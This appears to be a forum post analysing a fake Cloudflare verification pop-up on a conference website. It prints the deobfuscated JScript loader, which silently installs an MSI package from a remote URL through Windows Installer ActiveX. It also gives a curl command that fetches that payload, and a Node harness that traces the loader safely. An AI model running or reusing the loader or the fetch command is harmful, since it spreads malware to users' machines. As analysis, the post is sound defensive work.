Holy shit I just went to check out https://bilconference.com/ to see what it was about and I got this “cloudflare” pop-up to check that I was human, but I’m sure it’s fake and it’s actually a virus that has infected the site because it wants me to literally run a powershell script that downloads stuff and executes it on my computer.
Seems to be a loader. https://obf-io.deobfuscate.io/ deobfuscates this code into (The names appear to be randomly generated from a wordlist):
function func_OnePlus75() {}
func_OnePlus75();
function func_Palantir_usage07(arg_Splunk37) {}
try {
function func_LG46() {}
func_LG46();
var boosterx = {
gmarket: "UILEVEL",
assword: "https://rtcs.live/ds.php",
p: "InstallProduct"
};
function func_LinkedIn69() {}
func_LinkedIn69();
var adsvery = new ActiveXObject("WindowsInstaller.Installer");
function func_Qualcomm53() {}
func_Qualcomm53();
adsvery.UILEVEL = 2;
function func_VMware13() {}
func_VMware13();
adsvery.InstallProduct("https://rtcs.live/ds.php", "");
function func_Robinhood40() {}
func_Robinhood40();
} catch (p) {
console.error("Keys market LOW", p);
}
function func_traceid_container58() {}
func_traceid_container58();
function func_packetloss_monitor79(arg_token26) {}
{
"9781328";
}
If you remove all dead code this gives a single ActiveX call:
var adsvery = new ActiveXObject("WindowsInstaller.Installer");
adsvery.UILEVEL = 2;
adsvery.InstallProduct("https://rtcs.live/ds.php", "");
You can confirm the decompiler generated the correct URL by running the code in a non-vulnerable engine (e.g. V8) and stubbing the ActiveX implementation like this:
The malicious code tries to use an old Internet Explorer API (the old one, not the modern Chromium Edge) to instantiate a Windows COM object via the ActiveX API, which then is supposed to give access to the Windows Installer infrastructure. This Installer is then invoked to install a (probably malicious) package from the URL specified. Don’t be confused though, this script is not running in a browser - but instead in the Windows JavaScript host (cscript.exe //E:jscript), a runtime where the ActiveX API is supported.
I suppose this is all some kind of elaborate obfuscation to evade virus detection programs.
Well, whoever wrote this virus is incompetent - the msiexec payload does not even properly execute because the URL does not properly serve the download. Neither on Windows, nor on Linux (curl --http1.1 -4 -v "https://rtcs.live/ds.php" -H "Connection: Keep-Alive" -H "Accept: */*" -H "User-Agent: Windows Installer" -o virus.msi). Although I did observe a HTTP 403 Forbidden response when coming from Germany, and a HTTP 404 Not Found when coming from Romania or Brazil, which makes me think there is some additional check (or actual real CloudFlare fronting) going on regarding where the payload is served.
Anyway, the original URL (https://bilconference.com/) does not even attempt to infect me, nor serve the popup. Maybe some geoblocking is going on (see above); I even faked my user agent. In any case, you might want to check your browser for malicious add-ons.
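The "stub ActiveX and run it in V8" check mentioned above, as an added example that is not code from the thread: it runs the dead-code-stripped loader under Node with a recording ActiveXObject stub, so the Windows Installer call is logged instead of executed. The stub, the traceLoader helper and the LOADER_SRC string are assumptions constructed here from the deobfuscated snippet.

```javascript
// Added example: trace a JScript loader's COM activity under Node/V8 by
// replacing ActiveXObject with a recorder. Nothing is downloaded or installed.

// Every COM object the script tries to create ends up in `log` together with
// the properties it sets and the methods it calls.
function makeActiveXStub(log) {
  return function ActiveXObject(progId) {
    const entry = { progId, props: {}, calls: [] };
    log.push(entry);
    // A Proxy catches arbitrary property sets (UILEVEL = 2) and method calls
    // (InstallProduct(...)) without needing to know the real COM interface.
    return new Proxy({}, {
      set(_t, name, value) { entry.props[String(name)] = value; return true; },
      get(_t, name) {
        if (name === "then") return undefined; // keep the stub non-thenable
        return (...args) => { entry.calls.push({ method: String(name), args }); };
      },
    });
  };
}

// Run the loader source with only the stub and a silent console in scope.
// `new Function` keeps its declarations out of this module; it is NOT a
// security boundary, so only feed it code you have already read through.
function traceLoader(source) {
  const log = [];
  const quietConsole = { error() {}, log() {} };
  new Function("ActiveXObject", "console", source)(makeActiveXStub(log), quietConsole);
  return log;
}

// Constructed from the deobfuscated snippet in the thread (dead code removed).
const LOADER_SRC = `
try {
  var adsvery = new ActiveXObject("WindowsInstaller.Installer");
  adsvery.UILEVEL = 2;
  adsvery.InstallProduct("https://rtcs.live/ds.php", "");
} catch (p) {
  console.error("Keys market LOW", p);
}`;

// Prints the recorded progId, UILEVEL and the InstallProduct URL.
const TRACE = traceLoader(LOADER_SRC);
console.log(JSON.stringify(TRACE, null, 2));
```

The same harness works unchanged on the unstripped deobfuscator output, since the empty func_* declarations have no effect on the recorded trace.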